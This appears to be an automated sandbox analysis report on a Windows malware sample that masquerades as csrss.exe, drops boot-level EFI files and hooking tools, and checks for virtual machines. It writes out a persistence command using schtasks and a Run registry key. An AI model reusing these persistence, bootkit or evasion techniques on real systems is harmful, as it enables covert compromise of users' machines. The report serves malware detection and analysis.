Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
PE file contains sections with non-standard names
Source: injector.exe.14.dr Static PE information: section name: _RDATA
Source: windefender.exe.14.dr Static PE information: section name: UPX2
Source: bootmgfw.efi.14.dr Static PE information: section name: .xdata
Source: bootx64.efi.14.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.14.dr Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.14.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: NtQuerySystemInformationHook.dll.14.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: EfiGuardDxe.efi.14.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: windefender.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: bootmgfw.efi.14.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: injector.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: bootx64.efi.14.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: csrss.exe.10.dr Static PE information: real checksum: 0x45db04 should be: 0x4549c8
Source: 4t4y4r89UZ.exe Static PE information: real checksum: 0x45db04 should be: 0x4549c8
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub Jump to behavior
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\fodhelper.exe Executable created and started: C:\Windows\rss\csrss.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Drops PE files
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Jump to dropped file
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe Jump to dropped file

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
May modify the system service descriptor table (often done to hook functions)
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: VMUSRVC.EXE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: SHAREDINTAPP.EXESMSS.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWININIT.EXESHAREDINTAPP.EXECSRSS.EXESHAREDINTAPP.EXEWINLOGON.EXESHAREDINTAPP.EXESERVICES.EXESHAREDINTAPP.EXELSASS.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXEDWM.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESPOOLSV.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.